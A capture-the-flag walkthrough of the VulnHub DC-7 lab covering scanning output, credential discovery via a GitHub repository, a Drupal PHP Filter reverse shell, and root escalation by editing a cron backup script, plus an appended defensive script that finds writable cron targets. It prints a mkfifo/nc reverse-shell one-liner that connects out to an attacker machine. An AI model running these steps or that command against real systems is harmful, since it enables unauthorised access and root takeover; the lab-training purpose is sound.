
VulnHub::DC-7

Lab environment

The description notes that this target has only one entry point and a single flag.

Penetration process

0x01 Information gathering

The target's IP address is unknown, so the /24 subnet is scanned to find it:

masscan:

masscan 192.168.2.0/24 -p80 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-23 04:08:53 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.2.160
Discovered open port 80/tcp on 192.168.2.1

nmap:

nmap -sP 192.168.2.0/24 --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:10 CST
Nmap scan report for RT-N56U_B1.lan (192.168.2.1)
Host is up (0.0022s latency).
Nmap scan report for dc-7.lan (192.168.2.160)
Host is up (0.00084s latency).
Nmap scan report for Administrator.lan (192.168.2.210)
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.72 seconds

Visiting the hosts confirms that 192.168.2.160 is DC-7; next, a full port scan:

masscan 192.168.2.160 -p0-65535 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-23 04:19:37 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.2.160
Discovered open port 80/tcp on 192.168.2.160

Detailed scan of the open ports with nmap:

nmap -sC -sV -p22,80 --min-rate 1000 192.168.2.160
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 12:23 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for dc-7.lan (192.168.2.160)
Host is up (0.00076s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

whatweb fingerprinting:

whatweb http://192.168.2.160
http://192.168.2.160 [200 OK] Apache[2.4.25], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.2.160], MetaGenerator[Drupal 8 (https://www.drupal.org)], PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], UncommonHeaders[x-drupal-dynamic-cache,link,x-content-type-options,x-generator,x-drupal-cache], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

0x02 Solution

Exploration

Searching for known vulnerabilities in this CMS shows an RCE vulnerability, but it could not be exploited in testing.

Directory brute-forcing found no usable entry point.

Trying common weak passwords revealed that the admin login is temporarily locked after 5 failed attempts.

Finally, the target itself hints that the way in is from the outside.

Walkthrough

The page names the developer as @DC7USER.

Searching for that handle turns up a GitHub repository.

It contains the database username and password:

dc7user@dc-7:~$ ls
backups mbox
dc7user@dc-7:~/backups$ ls
website.sql.gpg  website.tar.gz.gpg

The files in the backup are GPG-encrypted. Reading the mbox file reveals the backup script:

It gives the GPG passphrase: PickYourOwnPassword

The backup script is run by root but can be modified by the www-data user.

Decrypt the GPG files:

gpg -d website.tar.gz.gpg > website.tar.gz
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase

This yields the site's source files and database dump:

They contain nothing useful.

Note the drush command in the script. Drush is a command line shell and Unix scripting interface for Drupal.

It can be used to change a Drupal user's password:

After resetting the admin password, login succeeds.

When editing an article, no PHP text format is available:

Searching for "Drupal reverse shell" shows that the PHP module must be enabled first:

Enable PHP Filter:

Reverse shell received:

Modify the backup script:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.2.210 10086 >/tmp/f

Wait for root's scheduled task to run the modified script and receive the root reverse shell:
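The root step above hinges on a root cron job running a script that a low-privileged account (www-data) can edit. As an added example that is not part of the original writeup, the following POSIX shell check lists scripts invoked from system crontab files (the `min hour dom mon dow user command` format) that are group- or world-writable; the file names used in the test are constructed.

```shell
#!/bin/sh
# Report scripts referenced by system crontab files that a non-owner can modify.
# Usage: writable_cron_targets /etc/crontab /etc/cron.d/*
# Note: per-user crontabs (crontab -l) have no user field and are not handled here.
writable_cron_targets() {
  for crontab in "$@"; do
    [ -r "$crontab" ] || continue
    # Skip comments, blank lines and VAR=value assignments.
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$crontab" |
    while IFS= read -r line; do
      # shellcheck disable=SC2086  # intentional word splitting into cron fields
      set -- $line
      [ $# -ge 7 ] || continue          # @reboot-style lines are skipped
      user=$6
      shift 6
      # Every absolute path in the command part is a candidate (interpreter and script).
      for tok in "$@"; do
        case $tok in /*) ;; *) continue ;; esac
        [ -f "$tok" ] || continue
        # -L follows symlinks so the target's permissions are inspected, not the link's.
        perm=$(ls -ldL "$tok" | cut -c1-10)
        case $perm in
          ?????w*|????????w?)            # group write bit (col 6) or other write bit (col 9)
            printf '%s runs as %s but is group/world writable (%s) via %s\n' \
              "$tok" "$user" "$perm" "$crontab" ;;
        esac
      done
    done
  done
}
```

Run it on a host with the paths in the usage line; an empty output means no cron-invoked script can be altered by someone other than its owner.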

Reference

Drupal: Reverseshell